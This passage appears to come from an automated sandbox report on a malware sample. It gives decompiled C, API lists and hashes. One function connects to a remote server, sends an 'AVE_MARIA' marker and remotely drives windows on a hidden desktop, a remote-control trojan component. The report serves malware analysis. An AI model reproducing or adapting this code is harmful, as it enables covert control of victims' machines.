				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t22;
				void* _t25;
				signed int _t27;
				signed int _t28;

				_t25 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E00B55F7B(_t25, _a12,  &_v28, E00B56E67(__eflags)) == 0) {
					_push(_a28);
					_t22 = E00B61E73(_t25, __eflags, _a4, _a8, _v20, _a16, _a20, _a24); // executed
					_t28 = _t22;
				} else {
					_t28 = _t27 | 0xffffffff;
				}
				if(_v8 != 0) {
					E00B564B8(_v20);
				}
				return _t28;
			}

0x00b61de3
0x00b61dee
0x00b61df1
0x00b61df4
0x00b61df7
0x00b61dfa
0x00b61dfd
0x00b61e17
0x00b61e1e
0x00b61e33
0x00b61e3b
0x00b61e19
0x00b61e19
0x00b61e19
0x00b61e41
0x00b61e46
0x00b61e4b
0x00b61e52

APIs

_free.LIBCMT ref: 00B61E46

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8143ebf9a4dcf1776887806264379338a6a5d6e367bb4900f7508eeb9ee533c7
Instruction ID: 310b44d34e6b3c33fd2e3079c51a67cfa9bde75f0eb85e3dba804b4fb5afecf7
Opcode Fuzzy Hash: 8143ebf9a4dcf1776887806264379338a6a5d6e367bb4900f7508eeb9ee533c7
Instruction Fuzzy Hash: D2012172C01159BFCF02AFA8DC01AEE7FF5AB08310F5445A5FD14A2151E6368A249B91

Uniqueness

Uniqueness Score: -1.00%

Function 00B598AF, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B598AF(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xb6a9c4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00B54AF9();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00B55BBD())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00B54B44(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

APIs

RtlAllocateHeap.NTDLL(00000008,00B425BB,00000000,?,00B584AF,00000001,00000364,00000007,000000FF,?,00000000,00000002,00B55BC2,00B56F5F,00000000), ref: 00B598F0

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a2e16d878fa7f0048382d41043bed4d8e759a6caa9aad976e3ebac37ed1f2c51
Instruction ID: c7aff50fff7458cc5385fb36e553cc0074aeb92d5938135820c6b22f3fcf0df7
Opcode Fuzzy Hash: a2e16d878fa7f0048382d41043bed4d8e759a6caa9aad976e3ebac37ed1f2c51
Instruction Fuzzy Hash: 23F0B431641625E6EF212B629C45B5B3BC8EF437A2B1940E1EC14A71C0DF64D80886A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B62FF5, Relevance: 1.5, APIs: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B62FF5(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t24;

				 *0xb6a6c4 =  *0xb6a6c4 + 1;
				_t24 = _a4;
				_t11 = E00B56F1C(0x1000); // executed
				 *((intOrPtr*)(_t24 + 4)) = _t11;
				E00B564B8(0);
				if( *((intOrPtr*)(_t24 + 4)) == 0) {
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t24 + 4)) = _t24 + 0x14;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t24 + 0x18)) = 0x1000;
				_t15 =  *((intOrPtr*)(_t24 + 4));
				 *(_t24 + 8) =  *(_t24 + 8) & 0x00000000;
				 *_t24 = _t15;
				return _t15;
			}

0x00b62ffa
0x00b63001
0x00b6300b
0x00b63012
0x00b63015
0x00b63023
0x00b63032
0x00b6303a
0x00b6303d
0x00b63025
0x00b63025
0x00b63028
0x00b63028
0x00b6303e
0x00b63041
0x00b63044
0x00b63049
0x00b6304d

APIs

Part of subcall function 00B56F1C: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00B5084B,00000002,?,?,?,00B424A9,00000000,0000002C,00B425BB), ref: 00B56F4E

_free.LIBCMT ref: 00B63015

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 10e2106890b211d56f191b7b205ed9e9a9d954201450bae07e6bf28713b6338d
Instruction ID: c992775e13074271442c2c73251a48161e7dc70ef82ed91cceaeeff1ac6c29db
Opcode Fuzzy Hash: 10e2106890b211d56f191b7b205ed9e9a9d954201450bae07e6bf28713b6338d
Instruction Fuzzy Hash: ADF0F6721003008FD3309F45D401B52F7FCEF40B12F10846FE29A876A1CBF8A4058B54

Uniqueness

Uniqueness Score: -1.00%

Function 00B56F1C, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B56F1C(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00B55BBD())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xb6a9c4, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00B54AF9();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00B54B44(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00B5084B,00000002,?,?,?,00B424A9,00000000,0000002C,00B425BB), ref: 00B56F4E

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54405ab98f22ca1b1593eaefd04978aadc7b74b1554d8c937a5eff735678ccda
Instruction ID: 27a844bddbb320cd7a956409ceb79f8cf33db31d1468fc752bb85c42a153a3e3
Opcode Fuzzy Hash: 54405ab98f22ca1b1593eaefd04978aadc7b74b1554d8c937a5eff735678ccda
Instruction Fuzzy Hash: CFE0E531A053116AD6203665AC05B5A37C8EB613A7F5501D0ED55971C0DFA4CC4885B5

Uniqueness

Uniqueness Score: -1.00%

Function 00B61B26, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B61B26(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x00b61b43
0x00b61b4a

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00B61F1C,?,?,00000000,?,00B61F1C,00000000,0000000C), ref: 00B61B43

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd61c6aabfafea9183610f378d9162387567f51b8f11bc8ebf94e5197ed9b119
Instruction ID: cdb13f47e2ca44311242c625e7518ff402c840f80f0b42531de72617250d4bb2
Opcode Fuzzy Hash: dd61c6aabfafea9183610f378d9162387567f51b8f11bc8ebf94e5197ed9b119
Instruction Fuzzy Hash: 04D06C3205410DBBDF028F84DC06EDA3BAAFB48714F014000FA1856060CB76E831AB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B45BB1, Relevance: 73.9, APIs: 37, Strings: 5, Instructions: 445
windownetworkthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E00B45BB1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				signed int _v24;
				char _v376;
				char _v404;
				struct _WINDOWPLACEMENT _v420;
				struct tagRECT _v436;
				struct tagRECT _v452;
				char _v454;
				short _v456;
				char _v460;
				char _v462;
				short _v464;
				char _v468;
				int _v476;
				signed int _v480;
				struct tagPOINT _v488;
				struct HWND__* _v492;
				long _v496;
				int _v500;
				long _v504;
				struct tagPOINT _v512;
				intOrPtr _v516;
				signed int _v520;
				intOrPtr _v524;
				void* __ebp;
				signed int _t119;
				int _t139;
				signed int _t140;
				signed int _t151;
				signed int _t154;
				unsigned int _t158;
				signed short _t160;
				struct HWND__* _t161;
				int _t162;
				int _t165;
				struct HMENU__* _t183;
				long _t189;
				struct tagPOINT _t198;
				long _t204;
				struct HWND__* _t206;
				long _t210;
				struct tagPOINT _t214;
				int _t215;
				CHAR* _t216;
				void* _t217;
				signed short _t218;
				intOrPtr _t220;
				int _t222;
				intOrPtr _t225;
				long _t227;
				intOrPtr _t228;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				struct HMENU__* _t240;
				intOrPtr* _t243;
				intOrPtr* _t245;
				struct HWND__* _t246;
				signed short _t247;
				int _t250;
				struct HWND__* _t251;
				int _t254;
				void* _t257;
				signed int _t258;
				signed int _t260;
				void* _t268;

				_t260 = (_t258 & 0xfffffff8) - 0x1a4;
				_t119 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t119 ^ _t260;
				_push(__esi);
				_push(__edi);
				_t225 = E00B446F7(__edi, __esi);
				_v436.bottom = _t225;
				SetThreadDesktop( *0xb6ae3c);
				_t243 = __imp__#19;
				_t204 = 0;
				_push(0);
				_push(0xa);
				_push("AVE_MARIA");
				_push(_t225);
				if( *_t243() <= 0) {
					L47:
					return E00B4AE43(_v24 ^ _t260);
				}
				_push(0);
				_push(4);
				_v420.ptMinPosition = 1;
				_push( &(_v420.ptMinPosition));
				_push(_t225);
				if( *_t243() <= 0) {
					goto L47;
				}
				_t245 = __imp__#16;
				_push(0);
				_push(4);
				_push( &_v404);
				_push(_t225);
				if( *_t245() == 0) {
					goto L47;
				}
				 *0xb6ae34 = CreateThread(0, 0, E00B44798, 0, 0, 0);
				_v436.top = 0;
				_v452.right = 0;
				_v452.top = 0;
				_v452.bottom = 0;
				_v436.left = 0;
				E00B457CD(0, _t225, _t245, _t257);
				_push(0);
				_push(4);
				_push( &_v452);
				_push(_t225);
				if( *_t245() <= 0) {
					L46:
					TerminateThread( *0xb6ae34, _t204);
					goto L47;
				}
				_t206 = _v452.bottom;
				while(1) {
					_push(0);
					_push(4);
					_push( &(_v452.right));
					_push(_t225);
					if( *_t245() <= 0) {
						break;
					}
					_push(0);
					_push(4);
					_push( &_v488);
					_push(_t225);
					if( *_t245() <= 0) {
						break;
					}
					_t139 = _v500;
					_v520 = 0;
					_t268 = _t139 - 0x404;
					if(_t268 > 0) {
						_t140 = _t139 - 0x405;
						__eflags = _t140;
						if(__eflags == 0) {
							E00B456CF(_t206, _t225, _t245, __eflags);
							L31:
							ScreenToClient(_t206,  &_v512);
							_push(_v512.y);
							_push(_v512.x);
							_push(_t206);
							while(1) {
								_t246 = ChildWindowFromPoint();
								if(_t246 == 0) {
									break;
								}
								__eflags = _t246 - _t206;
								if(__eflags == 0) {
									break;
								}
								_t206 = _t246;
								ScreenToClient(_t246,  &_v512);
								_push(_v512.y);
								_push(_v512.x);
								_push(_t246);
							}
							if(_v520 == 0) {
								_t210 = _v504;
							} else {
								_t210 = (_v512.y & 0x0000ffff) << 0x00000010 | _v512.x & 0x0000ffff;
								_v504 = _t210;
							}
							PostMessageA(_t206, _v500, _v476, _t210);
							L44:
							_t245 = __imp__#16;
							_push(0);
							_push(4);
							_push( &_v500);
							_push(_t225);
							if( *_t245() > 0) {
								continue;
							}
							break;
						}
						_t151 = _t140 - 1;
						__eflags = _t151;
						if(_t151 == 0) {
							E00B462A9();
							_t220 =  *0xb6ae38; // 0x0
							E00B46268(0xb6ad28, _t220);
							goto L47;
						}
						_t154 = _t151 - 1;
						__eflags = _t154;
						if(_t154 == 0) {
							E00B462A9();
							goto L47;
						}
						__eflags = _t154 - 1;
						if(__eflags == 0) {
							E00B44CEE(_t206, _t225, _t245, __eflags);
							goto L31;
						}
						L23:
						_t158 = _v504;
						_t227 = _v488.x;
						_t247 = _v488.y;
						_t214 = _t158;
						_t160 = _t158 >> 0x10;
						_push(_t160);
						_v520 = 1;
						_v512.x = _t214;
						_v512.y = _t160;
						_v488.x = _t214;
						_v488.y = _t160;
						_t161 = WindowFromPoint(_t214);
						__eflags = _v500 - 0x202;
						_t206 = _t161;
						if(_v500 != 0x202) {
							__eflags = _v500 - 0x201;
							if(_v500 != 0x201) {
								__eflags = _v500 - 0x200;
								if(__eflags != 0) {
									L30:
									_t225 = _v524;
									goto L31;
								}
								__eflags = _v480;
								if(__eflags == 0) {
									L43:
									_t225 = _v524;
									goto L44;
								}
								_t162 = _v492;
								__eflags = _t162;
								if(_t162 != 0) {
									_t206 = _t162;
								} else {
									_v496 = SendMessageA(_t206, 0x84, _t162, _v504);
								}
								_t228 = _t227 - _v512.x;
								_v520 = _t228;
								_v516 = _t247 - _v512.y;
								GetWindowRect(_t206,  &_v452);
								_t165 = _v452.left;
								_t222 = _v452.right - _t165;
								_t215 = _v452.top;
								_t250 = _v452.bottom - _t215;
								__eflags = _v496 - 0xd;
								if(__eflags > 0) {
									_t230 = _v496 - 0xe;
									__eflags = _t230;
									if(_t230 == 0) {
										_t215 = _t215 - _v516;
										_t250 = _t250 + _v516;
										__eflags = _t250;
										goto L75;
									}
									_t231 = _t230 - 1;
									__eflags = _t231;
									if(__eflags == 0) {
										_t250 = _t250 - _v516;
										goto L76;
									}
									_t232 = _t231 - 1;
									__eflags = _t232;
									if(_t232 == 0) {
										_t250 = _t250 - _v516;
										__eflags = _t250;
										goto L72;
									}
									__eflags = _t232 - 1;
									if(__eflags != 0) {
										goto L43;
									}
									_t250 = _t250 - _v516;
									goto L75;
								} else {
									if(__eflags == 0) {
										_t215 = _t215 - _v516;
										_t165 = _t165 - _t228;
										_t250 = _t250 + _v516;
										_t222 = _t222 + _t228;
										L76:
										MoveWindow(_t206, _t165, _t215, _t222, _t250, 0);
										_v492 = _t206;
										goto L43;
									}
									_t236 = _v496;
									__eflags = _t236;
									if(__eflags == 0) {
										_t165 = _t165 - _v520;
										_t215 = _t215 - _v516;
										goto L76;
									}
									_t237 = _t236 - 8;
									__eflags = _t237;
									if(__eflags == 0) {
										L72:
										_t165 = _t165 - _v520;
										_t222 = _t222 + _v520;
										goto L76;
									}
									_t238 = _t237 - 1;
									__eflags = _t238;
									if(_t238 == 0) {
										L75:
										_t222 = _t222 - _v520;
										__eflags = _t222;
										goto L76;
									}
									__eflags = _t238 - 1;
									if(__eflags != 0) {
										goto L43;
									}
									_t215 = _t215 - _v516;
									_t250 = _t250 + _v516;
									goto L76;
								}
							}
							__eflags = 0;
							_v480 = 1;
							_v492 = 0;
							_t216 = 0;
							_v468 = 0x37363402;
							_v464 = 0x2b2b;
							_v462 = 0;
							do {
								_t48 = _t216 + 0x40; // 0x40
								 *(_t260 + _t216 + 0x44) =  *(_t260 + _t216 + 0x44) ^ _t48;
								_t216 = _t216 + 1;
								__eflags = _t216 - 6;
							} while (_t216 < 6);
							_v462 = 0;
							_t251 = FindWindowA( &_v468, 0);
							GetWindowRect(_t251,  &_v436);
							_push(_v512.y);
							__eflags = PtInRect( &_v436, _v512.x);
							if(__eflags == 0) {
								E00B4D0F0(_t227,  &_v376, 0, 0x104);
								_t260 = _t260 + 0xc;
								RealGetWindowClassA(_t206,  &_v376, 0x104);
								_v460 = 0x74707263;
								_t217 = 0;
								__eflags = 0;
								_v456 = 0x7d72;
								_v454 = 0;
								do {
									_t67 = _t217 + 0x40; // 0x40
									 *(_t260 + _t217 + 0x4c) =  *(_t260 + _t217 + 0x4c) ^ _t67;
									_t217 = _t217 + 1;
									__eflags = _t217 - 6;
								} while (_t217 < 6);
								_t72 =  &_v460; // 0x74707263
								_v454 = 0;
								__eflags = lstrcmpA( &_v376, _t72);
								if(__eflags != 0) {
									goto L30;
								}
								_t183 = SendMessageA(_t206, 0x1e1, 0, 0);
								_push(_v512.y);
								_t240 = _t183;
								_t254 = MenuItemFromPoint(0, _t240, _v512.x);
								GetMenuItemID(_t240, _t254);
								PostMessageA(_t206, 0x1e5, _t254, 0);
								PostMessageA(_t206, 0x100, 0xd, 0);
								goto L43;
							}
							PostMessageA(_t251, 0xf5, 0, 0);
							goto L43;
						}
						_v480 = 0;
						_t189 = SendMessageA(_t206, 0x84, 0, _v504);
						__eflags = _t189 - 0xffffffff;
						if(__eflags == 0) {
							SetWindowLongA(_t206, 0xfffffff0, GetWindowLongA(_t206, 0xfffffff0) | 0x08000000);
							SendMessageA(_t206, 0x84, 0, _v504);
							goto L30;
						}
						__eflags = _t189 - 8;
						if(__eflags == 0) {
							_push(0);
							_push(0xf020);
							L34:
							_push(0x112);
							L29:
							PostMessageA(_t206, ??, ??, ??);
							goto L30;
						}
						__eflags = _t189 - 9;
						if(_t189 == 9) {
							_v420.length = 0x2c;
							GetWindowPlacement(_t206,  &_v420);
							__eflags = _v420.flags & 0x00000003;
							_push(0);
							if(__eflags == 0) {
								_push(0xf030);
							} else {
								_push(0xf120);
							}
							goto L34;
						}
						__eflags = _t189 - 0x14;
						if(__eflags != 0) {
							goto L30;
						}
						_push(0);
						_push(0);
						_push(0x10);
						goto L29;
					}
					if(_t268 == 0) {
						E00B44F57(_t206, _t225, _t245, __eflags);
						goto L31;
					}
					if(_t139 < 0x100) {
						goto L23;
					}
					if(_t139 <= 0x102) {
						_t218 = _v488.y;
						_t198 = _v488;
						_push(_t218);
						_v512 = _t198;
						_v512.y = _t218;
						_t206 = WindowFromPoint(_t198);
						goto L31;
					}
					if(_t139 == 0x401) {
						E00B457CD(_t206, _t225, _t245, _t257);
						goto L31;
					}
					if(_t139 == 0x402) {
						CreateThread(0, 0, E00B45A71, 0, 0, 0);
						goto L31;
					}
					_t273 = _t139 - 0x403;
					if(_t139 != 0x403) {
						goto L23;
					}
					E00B44A91(_t206, _t225, _t245, _t257, _t273);
					goto L31;
				}
				_t204 = 0;
				goto L46;
			}

APIs

Part of subcall function 00B446F7: WSAStartup.WS2_32(00000202,?), ref: 00B44718
Part of subcall function 00B446F7: socket.WS2_32(00000002,00000001,00000000), ref: 00B44729
Part of subcall function 00B446F7: gethostbyname.WS2_32(00B6AD28), ref: 00B4473B
Part of subcall function 00B446F7: htons.WS2_32(00000000), ref: 00B44763
Part of subcall function 00B446F7: connect.WS2_32(00000000,?,00000010), ref: 00B44774

SetThreadDesktop.USER32 ref: 00B45BDF
send.WS2_32(00000000,AVE_MARIA,0000000A,00000000), ref: 00B45BF6
send.WS2_32(00000000,?), ref: 00B45C11
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C2A
CreateThread.KERNEL32(00000000,00000000,Function_00014798,00000000,00000000,00000000), ref: 00B45C3E

Part of subcall function 00B457CD: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00B45892
Part of subcall function 00B457CD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B458BA
Part of subcall function 00B457CD: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00B458DC
Part of subcall function 00B457CD: GetWindowsDirectoryA.KERNEL32(?,00000104,770BE3A0,?,00000000), ref: 00B458FE
Part of subcall function 00B457CD: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00B4592A

recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C6B
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C83
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C97
CreateThread.KERNEL32(00000000,00000000,Function_00015A71,00000000,00000000,00000000), ref: 00B45CF1

Part of subcall function 00B44A91: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44ADE
Part of subcall function 00B44A91: lstrcatA.KERNEL32(00000000,?), ref: 00B44B2F
Part of subcall function 00B44A91: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00B44B52
Part of subcall function 00B44A91: lstrcatA.KERNEL32(00000000,?,?), ref: 00B44B9B

WindowFromPoint.USER32(?,00000001), ref: 00B45D18
WindowFromPoint.USER32(00000000,?), ref: 00B45D82
SendMessageA.USER32 ref: 00B45DAF
PostMessageA.USER32(00000000,00000112,0000F020,00000000), ref: 00B45DCA
ScreenToClient.USER32 ref: 00B45DDA
GetWindowPlacement.USER32(00000000,?), ref: 00B45DFC
GetWindowLongA.USER32 ref: 00B45E28
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00B45E37
SendMessageA.USER32 ref: 00B45E48
FindWindowA.USER32(?,00000000), ref: 00B45E94
GetWindowRect.USER32 ref: 00B45EA2
PtInRect.USER32(?,?,?), ref: 00B45EB5
PostMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00B45EC9
recv.WS2_32(?,00000200,00000004,00000000), ref: 00B45EE3
TerminateThread.KERNEL32(00000000), ref: 00B45EF6
RealGetWindowClassA.USER32(00000000,?,00000104), ref: 00B45F37
lstrcmpA.KERNEL32(?,crpt), ref: 00B45F72
SendMessageA.USER32 ref: 00B45F8A
MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 00B45F9C
GetMenuItemID.USER32(00000000,00000000), ref: 00B45FA6
PostMessageA.USER32(00000000,000001E5,00000000,00000000), ref: 00B45FBB
PostMessageA.USER32(00000000,00000100,0000000D,00000000), ref: 00B45FC7
SendMessageA.USER32 ref: 00B45FFA
GetWindowRect.USER32 ref: 00B4601E
MoveWindow.USER32(?,?,00000004,00000000,00000004,00000000), ref: 00B460C9
ScreenToClient.USER32 ref: 00B460F8
ChildWindowFromPoint.USER32 ref: 00B46107
PostMessageA.USER32(00000000,?,?,?), ref: 00B4613D

Strings

r}, xrefs: 00B45F47
AVE_MARIA, xrefs: 00B45BF0
crpt, xrefs: 00B45F60, 00B45F69
++, xrefs: 00B45E72
,, xrefs: 00B45DF2

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Message$Postrecv$FromPointSendThread$Rectlstrcat$ClientCreateFolderItemLongMenuPathScreenValuesend$ChildClassDesktopDirectoryFindMoveOpenPlacementQueryRealStartupTerminateWindowsconnectgethostbynamehtonslstrcmpsocket
String ID: ++$,$AVE_MARIA$crpt$r}
API String ID: 3286681106-786296257
Opcode ID: 1b928f69498a00a7096ebde35387ba409772ee9602c4583048219f71e232a5cf
Instruction ID: 7bd856bc1f9f3534aab8fe10c13b104995754a2dcf3a9439685b0e49f69d15f3
Opcode Fuzzy Hash: 1b928f69498a00a7096ebde35387ba409772ee9602c4583048219f71e232a5cf
Instruction Fuzzy Hash: 05F19071548701AFD7219F24CD88E2BBBE8EB8A744F10095DF585A3291DBB4DA04EB63

Uniqueness

Uniqueness Score: -1.00%

Function 00B49CBF, Relevance: 35.5, APIs: 5, Strings: 15, Instructions: 467
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00B49CBF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t145;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t148;
				void _t149;
				void _t150;
				void _t153;
				void _t154;
				void _t157;
				void _t158;
				void _t161;
				void _t162;
				void _t165;
				void _t166;
				void* _t169;
				void _t170;
				void _t171;
				void* _t174;
				void _t175;
				void _t176;
				void* _t179;
				void _t180;
				void _t181;
				void* _t184;
				void _t185;
				void _t186;
				void* _t189;
				void _t190;
				void _t191;
				void _t194;
				void _t195;
				void* _t198;
				void _t199;
				void _t200;
				char* _t202;
				void* _t203;
				char* _t204;
				char* _t208;
				char* _t212;
				char* _t216;
				char* _t220;
				void* _t225;
				signed int _t226;
				char* _t228;
				char _t233;
				char _t235;
				char _t237;
				char _t239;
				char _t241;
				signed int _t243;
				signed int _t249;
				signed int _t255;
				signed int _t261;
				signed int _t267;
				signed int _t274;
				signed int _t281;
				signed int _t288;
				signed int _t295;
				signed int _t302;
				signed int _t308;
				signed int _t315;
				void* _t333;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t342;
				signed int _t343;
				void* _t344;
				signed int _t345;
				void* _t346;
				signed int _t347;
				void* _t348;
				signed int _t349;
				void* _t350;
				signed int _t351;
				void* _t352;
				signed int _t353;
				void* _t354;
				signed int _t355;
				void* _t356;
				signed int _t357;
				void* _t358;
				signed int _t359;
				void* _t360;
				signed int _t361;
				intOrPtr _t363;
				void* _t365;
				void* _t371;
				void* _t377;
				void* _t383;
				void* _t389;
				void* _t395;
				void* _t401;
				void* _t407;
				void* _t413;
				void* _t418;
				void* _t423;
				void* _t428;
				intOrPtr _t435;
				void* _t436;
				void* _t437;
				void* _t438;
				void* _t439;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t443;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t451;
				signed int _t452;
				signed int _t454;
				void* _t455;
				void* _t457;
				void* _t459;
				void* _t461;
				void* _t463;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t469;
				void* _t471;
				void* _t473;
				void* _t475;
				void* _t477;
				void* _t478;
				signed int _t479;

				_t134 =  *0xb69014; // 0x7e8b4fb6
				 *(_t454 + 0x70) = _t134 ^ _t454;
				_t225 =  *(_t454 + 0x7c);
				_push(0x104);
				_t136 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x18)) = _t136;
				_t363 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x28)) = _t363;
				_t138 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x24)) = _t138;
				_t139 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x2c)) = _t139;
				_t435 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x38)) = _t435;
				E00B509A2();
				_t455 = _t454 + 0x18;
				 *((intOrPtr*)(_t455 + 0x28)) = 0x31273235;
				_t9 = _t455 + 0x28; // 0x31273235
				 *((intOrPtr*)(_t455 + 0x2c)) = 0x222b242a;
				 *((char*)(_t455 + 0x30)) = 0;
				_t143 = E00B5187C(E00B49790(_t9));
